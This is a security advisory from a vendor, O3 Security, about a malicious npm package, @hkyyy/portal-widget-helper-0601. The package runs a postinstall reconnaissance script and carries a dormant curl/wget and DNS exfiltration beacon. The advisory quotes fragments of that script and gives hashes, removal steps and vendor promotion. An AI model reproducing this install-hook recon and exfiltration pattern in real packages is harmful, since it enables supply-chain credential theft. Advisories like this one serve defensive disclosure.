Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

@hkyyy/portal-widget-helper-0601npm

@hkyyy/portal-widget-helper-0601 is a confirmed malicious npm package (MAL-2026-10648) that steals credentials and exfiltrates sensitive data (malicious version 1.0.0). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in @hkyyy/portal-widget-helper-0601 (npm)

MAL-2026-10648
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall @hkyyy/portal-widget-helper-0601

What this malware does

The package has no real functionality — index.js only exports { ok: true } — and its sole effect is to run a postinstall reconnaissance script. package.json declares scripts.install -> node postinstall.js, which on npm install executes whoami, id, hostname, captures cwd and Node version, and prints a PROOF_BEGIN/PROOF_END block to stderr. postinstall.js also contains a fully-formed exfiltration path that issues curl -fsS "${url}" || wget -qO- "${url}" and a dns.lookup(sub,...) call against a DNSLOG_URL constant. The URL is currently the placeholder string 'CHANGE_ME_DNSLOG_URL', so the network beacon is gated off in this published version, but the host-recon commands fire unconditionally and the exfil channel is one literal-string edit away from active. The package name @hkyyy/portal-widget-helper-0601 (date-suffixed variant of an apparent internal package name) plus the trivial body match the standard dependency-confusion PoC shape: the package exists to be picked up by mistaken namespace/version resolution and to fingerprint the installer's host.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

b3b0ce2b99bea6ebe380f50b96b9729b4e293690631a77ec7a3c3023510d2bdf
f72e27d8bfbf5b9bfefe661d642be934399a38031c1bee028a20ed3282e0f482

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @hkyyy/portal-widget-helper-0601 (version 1.0.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @hkyyy/portal-widget-helper-0601 across your stack and pipelines.

  2. If you installed it — respond

    @hkyyy/portal-widget-helper-0601 is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If @hkyyy/portal-widget-helper-0601 was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks @hkyyy/portal-widget-helper-0601 before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. @hkyyy/portal-widget-helper-0601 on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

GHSA-wgx8-6mv9-p6jmIN-MAL-2026-010622

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks @hkyyy/portal-widget-helper-0601-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Explore

@hkyyy/portal-widget-helper-0601 (npm) malicious package — MAL-2026-10648 | O3 Security